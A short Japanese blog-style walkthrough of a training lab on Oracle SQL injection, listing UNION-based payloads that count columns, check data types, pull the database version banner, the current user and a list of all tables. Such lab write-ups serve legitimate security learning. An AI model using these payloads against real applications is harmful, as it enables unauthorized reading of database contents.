Hello there, ('ω')ノ
SQLインジェクション攻撃、Oracleのデータベースタイプとバージョンのクエリを。
このラボには、SQLインジェクションの脆弱性があって。
UNION攻撃で、クエリから結果を取得できるらしく。
まずは、ページにアクセスして。
リクエストをリピータへ。
はじめに下記のクエリで列数の確認をするとエラーが出て。
'+UNION+SELECT+NULL+FROM+DUAL--
2つのカラムのクエリだと正常なレスポンスが返ってくるので。
'+UNION+SELECT+NULL,NULL+FROM+DUAL--
それからカラムのデータ型の確認をして。
'+UNION+SELECT+'abc','xyz'+FROM+DUAL--
下記を挿入するとデータベースのバージョンが表示されて。
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
クリアできた。
オラクルに関するSQLインジェクションのペイロードはWEB上にあって。
http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
ペイロードを参考に下記を挿入した結果だと。
'+UNION+SELECT+user,'xyz'+FROM+DUAL--
下記のペイロードもあったりと。
'+UNION+SELECT+table_name,'xyz'+FROM+all_tables--
Best regards, (^^ゞ
